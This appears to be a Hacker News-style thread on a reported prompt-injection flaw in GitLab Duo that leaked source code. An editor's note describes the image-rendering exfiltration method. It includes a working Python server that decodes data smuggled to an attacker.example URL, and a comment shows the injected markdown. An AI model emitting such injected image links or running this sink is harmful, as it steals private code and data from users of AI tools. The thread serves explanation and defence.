Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft

37 points · posted by chillax · 2 days ago

5 comments

cedws · 2 days ago
Until prompt injection is fixed, if it ever is, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
wunderwuzzi23 · 1 day ago
Great work!

Data leakage via untrusted third-party servers (especially via image rendering) is one of the most common AI appsec issues, and it's concerning that big vendors do not catch these before shipping.

I built the ASCII Smuggler mentioned in the post and have documented the image exfiltration vector on my blog in the past as well, with 10+ findings across vendors.

GitHub Copilot Chat had a very similar bug last year.
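[Editor's note: to make the image-rendering exfiltration vector concrete, here is a minimal attacker-side sketch. It is not taken from the GitLab write-up; the attacker.example domain, the pixel.png path, and the "d" query parameter are all hypothetical. The idea is only that an injected instruction makes the assistant emit a markdown image whose URL carries encoded data, and rendering that image leaks it.]

```python
# Minimal sketch of the image-rendering exfiltration channel (hypothetical names).
#
# An injected prompt tricks the assistant into emitting markdown such as:
#   ![status](https://attacker.example/pixel.png?d=<base64 of private data>)
# When the chat UI renders that image, the victim's browser issues a GET
# request, delivering the encoded data to the attacker's server below.

import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse


class ExfilSink(BaseHTTPRequestHandler):
    def do_GET(self):
        # Pull the smuggled data out of the query string and decode it.
        params = parse_qs(urlparse(self.path).query)
        for blob in params.get("d", []):
            print("leaked:", base64.urlsafe_b64decode(blob).decode("utf-8", "replace"))

        # Respond with a 1x1 transparent GIF so the rendered "image" looks harmless.
        gif = base64.b64decode(
            "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"
        )
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(gif)))
        self.end_headers()
        self.wfile.write(gif)


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ExfilSink).serve_forever()
```

The mitigation usually discussed for this class of bug is the same across vendors: restrict which domains the chat UI will render images from, or stop rendering model-emitted image markdown altogether.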
nusl · 2 days ago
GitLab's remediation seems a bit sketchy at best.
mdaniel · 2 days ago
Running Duo as a system user was crazypants, and I'm sad that GitLab fell into that trap. They already have personal access tokens, so even if they had to silently create one just for use with Duo, that would be a marked improvement over giving an LLM read access to every repo in the platform.
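[Editor's note: a short sketch of the least-privilege point above. The endpoint, headers, and parameters are standard GitLab REST API; the token values are hypothetical. If the assistant acted with a token scoped to the requesting user rather than a system account, an injected instruction could only reach repositories that user can already read.]

```python
# Contrast of blast radius under a user-scoped token vs. an instance-wide one.
# Uses GitLab's public REST API; the base URL and tokens are hypothetical.

import requests

GITLAB = "https://gitlab.example.com/api/v4"


def visible_projects(token: str) -> list[str]:
    # membership=true limits results to projects the token's user belongs to;
    # a system/admin credential would instead be able to enumerate everything.
    resp = requests.get(
        f"{GITLAB}/projects",
        headers={"PRIVATE-TOKEN": token},
        params={"membership": "true", "simple": "true"},
    )
    resp.raise_for_status()
    return [p["path_with_namespace"] for p in resp.json()]


# A per-user personal access token with read_api / read_repository scope keeps
# any prompt-injected request confined to that user's own projects.
print(visible_projects("glpat-user-scoped-token"))  # hypothetical token
```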
aestetix · 1 day ago
Does that mean Gitlab Duo can run Doom?